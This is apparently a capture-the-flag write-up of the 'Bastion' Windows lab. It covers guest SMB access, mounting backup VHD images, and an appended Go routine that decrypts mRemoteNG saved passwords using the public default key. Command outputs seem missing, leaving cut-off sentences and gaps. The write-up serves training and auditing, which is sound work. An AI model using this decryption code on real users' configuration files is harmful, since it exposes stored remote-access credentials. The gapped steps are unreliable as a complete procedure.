Bastion is a simple Windows machine that involves Windows backups and insecure tool configurations.
As always, let’s run a port scan using our trusty nmap:
SMB lets us authenticate as the guest user, so let's check what's on it:
smbclient takes the user's password after the % symbol, but the guest user needs no password.
Let's mount the Backups share and explore it:
The share contains a folder named WindowsImageBackup, which is created by the Windows Backup utility. The backups are stored as .vhd (virtual hard disk) files. After installing the software that lets us mount those files (sudo apt install libguestfs-tools), let's search for them:
There are two .vhd files. Let’s mount them:
The first drive (9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd) is the backup of the boot partition and contains nothing useful.
Mounting the second drive (9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd), we find that it is a backup of the entire system:
Let’s ssh into the box and get the flag:
After exploring the file system, we find a recently installed program, mRemoteNG, which is used to manage remote connections.
A quick Google search tells us that this program saves connection passwords in a configuration file under %APPDATA% and encrypts them with AES, using the MD5 hash of the string "mR3m" as the key. Let's search for the configuration file:
After printing the file's contents with the command type confCons.xml, we find the
Let’s use a tool to decrypt the password:
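As an added example (not the write-up's tool and not mRemoteNG's own code), here is a small Go audit that implements the scheme just described, MD5("mR3m") as the AES key, and reports whether a stored connection password still relies on that public default. The on-disk layout base64(IV || AES-128-CBC with PKCS#7 padding) and the Protect helper that builds constructed sample input are assumptions.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"crypto/rand"
	"encoding/base64"
	"fmt"
	"unicode/utf8"
)

const DefaultMasterPassword = "mR3m" // fixed default from the write-up, used when no master password is set
// legacyCipher derives the AES-128 key as the write-up describes: MD5(master password).
func legacyCipher(master string) cipher.Block {
	sum := md5.Sum([]byte(master))
	block, _ := aes.NewCipher(sum[:]) // 16-byte key: cannot fail
	return block
}
// Protect builds a value in the assumed legacy layout base64(IV || AES-128-CBC(PKCS#7(plaintext))) as constructed audit input.
func Protect(plaintext, master string) string {
	pad := aes.BlockSize - len(plaintext)%aes.BlockSize
	padded := append([]byte(plaintext), bytes.Repeat([]byte{byte(pad)}, pad)...)
	buf := make([]byte, aes.BlockSize+len(padded)) // random IV first, ciphertext after
	if _, err := rand.Read(buf[:aes.BlockSize]); err != nil {
		panic(err)
	}
	cipher.NewCBCEncrypter(legacyCipher(master), buf[:aes.BlockSize]).CryptBlocks(buf[aes.BlockSize:], padded)
	return base64.StdEncoding.EncodeToString(buf)
}
// Recover opens a stored value with the given master password; bad padding or non-UTF-8 output means the password or the format is wrong.
func Recover(encoded, master string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(encoded)
	if err != nil || len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return "", fmt.Errorf("not a legacy mRemoteNG value (%v)", err)
	}
	pt := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(legacyCipher(master), raw[:aes.BlockSize]).CryptBlocks(pt, raw[aes.BlockSize:])
	pad := int(pt[len(pt)-1])
	if pad == 0 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) || !utf8.Valid(pt[:len(pt)-pad]) {
		return "", fmt.Errorf("wrong master password for this value")
	}
	return string(pt[:len(pt)-pad]), nil
}
// UsesDefaultMasterPassword is the audit check: true when the value opens with the public default.
func UsesDefaultMasterPassword(encoded string) bool {
	_, err := Recover(encoded, DefaultMasterPassword)
	return err == nil
}
```

Because the default key is a public constant, a configuration left on the default is readable by anyone who can read the file, which is why setting a custom master password in mRemoteNG and keeping confCons.xml out of shared backups matters. A decryption failure here can also simply mean the value is not in the legacy layout.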
Let's ssh into the box as administrator and get the flag: